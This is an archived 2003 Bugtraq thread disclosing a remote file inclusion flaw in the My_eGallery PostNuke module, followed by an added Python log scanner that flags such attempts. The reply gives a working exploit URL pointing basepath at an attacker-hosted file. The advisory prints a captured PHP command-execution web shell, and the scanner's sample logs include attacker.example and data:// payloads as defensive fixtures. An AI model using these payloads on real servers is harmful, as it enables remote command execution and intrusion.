lists.openwall.net - Open Source and information security mailing list archives
Message-ID: <3FC936DF.7050608@runbox.com>
Date: Sun, 30 Nov 2003 01:16:31 +0100
From: Fauvet Ludovic <etix@...box.com>
To: bugtraq@...urityfocus.com
Subject: Re: Remote execution in My_eGallery

Hi,

There are some PHP scripts which are vulnerable. One of these is
displayCategory.php. So you just have to go to:

http://www.[vulnerable].com/modules/My_eGallery/public/displayCategory.php?basepath=http://[yourwebsite].com

and create a directory "public" in the root of your website and put a file
named imageFunctions.php with the code you want to inject.

--
/*-------------------
Best regards,
[::eTiX::] (Fauvet Ludovic)
-------------------*/

Bojan Zdrnja wrote:
> Product: My_eGallery
> Versions affected: all <3.1.1.g
> Website: http://lottasophie.sourceforge.net/index.php
>
> 1. Introduction
> ---------------
>
> My_eGallery is a very nice PostNuke module, which allows users to create and
> manipulate their own galleries on the web, plus offers various additional
> features.
> For more information and a demonstration you can go to the Website above.
>
> 2. Exploit
> ----------
>
> Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
> vulnerability.
>
> Certain PHP files have some parameters which are used, unfiltered, in
> include functions.
> An intruder can craft PHP code on their Web site and supply a parameter to
> My_eGallery so it actually includes the malicious PHP code.
>
> The following code was captured as being used in the wild (edited
> intentionally):
>
> <?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) @chdir($chdir);
> ob_start();
> execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
> $output = ob_get_contents();
> ob_end_clean();
> print_output();
> ?>
>
> This allows execution of any command on the server with My_eGallery, under
> the privileges of the Web server (usually apache or httpd).
>
>
> 3. Solution
> -----------
>
> Vendor was contacted and promptly replied. Fix is available at the vendor's
> site:
>
> http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5
>
> As this was seen being exploited in the wild, users are urged to upgrade to
> the latest version as soon as possible.
>
>
>
>
> Regards,
>
> Bojan Zdrnja
> CISSP
>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.1

mQGiBD744NQRBACSpcLYHKjo3PCDHVuJZFkzNkK9gzjCNXQnzIwpPwEI5xJd5VuX
g3+gNw0VfYx/qtIXhKW0lGAulEearMpc3SzxTB7vbz8DNU/xquxJPl4yovroJVQz
fE+r9O836yF2SvD8SgiCZfT1uBDNhU2C7z72epc5jsSYDqBMyjm/DS8t7wCg3zgF
NbwEYkx65RNBw4wpGV+o42kD/itttOB/P0Qy8/TLo8RL591PjovuCXsuy11ojS3W
Prewtx9hLO1lheqtrM+xh1fZ9P2c99KBbqVYAHLYjG/rIJGGap9TvisXYnZw2xYg
XQUpv1IB3TyUjKykTwD1L9lTl40Gy32NQLVmf4QEowXJxANVQcybe6GjoMifoY4U
bYZgA/45OW7lL6ufLVREo3WMWIxCqwPDWmyTvAk4vPKexhcSvTgBrjaUFKn8Jk0A
W0IyEM9JjTckgGVOoP5tubhEk2xVzc7dZ0D9oJvmHj92dp0Sbb+HG1uD4v2VmWWM
OoZTDvbk52LJHqfTlXZpalbmFBPg63KzIANgADdicrxxRTLE9LQtRmF1dmV0IEx1
ZG92aWMgKFs6OmVUaVg6Ol0pIDxldGl4QHJ1bmJveC5jb20+iFkEExECABkFAj74
4NQECwcDAgMVAgMDFgIBAh4BAheAAAoJEM+k/AIs6moUaN4AoKrMa/7z7ioFoMM+
ZCN7XGF5pZgpAJ9P0s2pjF2yajoQhT+PPf1WkKmY07kBzQQ++ODZEAcAvAG8v2P8
rWZAs3nFpCJxxYLyEd/HzanEhZ0o2uOQbwrQO3lfJRKwvjhkiZ4Th3bEILEShvhe
gVR4Q2KhSD/c7NUmADI945OMCwWajgPF+/voYKuChLt0gFiOYiT5aK9ElhU9BjTe
guAyMvAsxxski8ntJn+FX7KTjmwqfyRdJtvvxPh5bqqctJqkgVEeGfBPAL0aCjBh
ucZB2j8Ecadzy9SNIvYrF7S1QpBFk7+8dIz15gqd00YPJa5eoUzI/AO1FIKigZdt
mg60PLMNvU5q+TmKFhibE8ZjGOjzErlRM+8AAwUHAKuTuFGLzggST4hvDnI88yLY
q4GUvH+DlAtmhhElOz9HBgNl1sppLqzqnHhcMAaiHKYBU/OV4tNI+FlhfbV8ZQEx
EWKTtxO0sLX3zXWxghkmfxglZggejb8R5pwvP0EzBuKpthAEAHRbWdZxkrqUDw8q
IuPetoeHOCeFMYLeneZZPnPfGALSxfg3ivQMf5tn3LAvP+80dOOVdB0k5GWdWv/4
yBj+mUnhdLuRbtL2mate/jPLB8JGhklk4nntXkf9DvUUhqEYrEx1o1jYyRYFUkVy
bMiS0y3S26O/pgDz88GRiEYEGBECAAYFAj744NkACgkQz6T8AizqahQYXACgjPiE
/GBKDhTcWf1F1A+4aVIazksAoKTa1m181gR8wHDa84VbRQ5aCShe
=Sid/
-----END PGP PUBLIC KEY BLOCK-----
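The technique in this thread is a remote file inclusion: a request parameter (`basepath`) reaches PHP's include() unfiltered, so a value beginning with http:// makes the server fetch and execute the attacker's imageFunctions.php. The block below is an added example written for this page, not code from the original posts or from My_eGallery: a detector that runs over Apache combined-format access-log lines and flags requests where that include parameter (or any parameter) carries a URL scheme or a PHP stream wrapper. The log lines, client addresses and host names are constructed; the `data:` and `php://` wrapper cases and the path-traversal check are generalisations beyond the http:// case shown in the post, since PHP's include() accepts those streams as well (network URLs only when allow_url_fopen / allow_url_include permit it).

```python
"""Flag remote-file-inclusion (RFI) attempts, like the basepath= technique in this
thread, in Apache combined-format access logs (added example, not My_eGallery code)."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines (not taken from the original post): a benign request,
# the plain http:// technique, a percent-encoded variant with a trailing cmd=, and a
# data: stream-wrapper variant. Addresses and host names are documentation values.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Nov/2003:01:10:02 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=modules/My_eGallery HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
198.51.100.9 - - [30/Nov/2003:01:12:44 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example HTTP/1.0" 200 314 "-" "Mozilla/4.0"
198.51.100.9 - - [30/Nov/2003:01:13:01 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fattacker.example%2F&cmd=id HTTP/1.0" 200 288 "-" "Mozilla/4.0"
192.0.2.77 - - [30/Nov/2003:01:15:30 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg== HTTP/1.0" 200 1020 "-" "curl/7.10"
"""

# Apache "combined" format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) '
)

# Values that PHP include()/require() treat as a stream rather than a local path:
# network URLs (when allow_url_fopen / allow_url_include permit it) and the data:,
# php://, expect:// and phar:// wrappers. Generalises the http:// case in the post.
STREAM_RE = re.compile(r'^\s*(?:(?:https?|ftps?|php|expect|phar)://|data:)', re.IGNORECASE)

# Script -> parameters the advisory says reach include() unfiltered (assumed set).
WATCHED = {"displaycategory.php": {"basepath"}}


def parse_query(query):
    """Split a query string on '&' only and percent-decode both sides of each pair,
    so basepath=http%3A%2F%2F... is seen as http://... (';' is kept because it is
    part of data: URIs and some stdlib versions would otherwise split on it)."""
    pairs = []
    for item in query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    return {"ip": m["ip"], "ts": m["ts"], "path": parts.path,
            "params": parse_query(parts.query), "status": int(m["status"])}


def classify(req):
    """Return (severity, param, value) findings for one parsed request.
    high:   a watched include parameter carries a URL scheme or stream wrapper
    medium: any other parameter carries one, or a watched parameter carries a
            traversal / absolute path (the local-file-inclusion sibling of this bug)"""
    findings = []
    script = req["path"].rsplit("/", 1)[-1].lower()
    watched = WATCHED.get(script, set())
    for name, value in req["params"]:
        is_watched = name.lower() in watched
        if STREAM_RE.match(value):
            findings.append(("high" if is_watched else "medium", name, value))
        elif is_watched and ("../" in value or value.startswith("/")):
            findings.append(("medium", name, value))
    return findings


def scan(log_text):
    """Run classify() over every parseable line and return a flat list of alerts."""
    alerts = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        for severity, name, value in classify(req):
            alerts.append({"ip": req["ip"], "ts": req["ts"], "path": req["path"],
                           "severity": severity, "param": name, "value": value})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["severity"]:<6} {a["ip"]:<15} {a["ts"]} {a["path"]} {a["param"]}={a["value"]}')
```

Run against the constructed sample, the benign first line produces nothing and the three basepath= lines each produce one high-severity alert; note that the percent-encoded variant is only caught because the value is decoded before the scheme check, and that a 200 status tells you nothing about whether the include succeeded, so every hit should be followed up on the host.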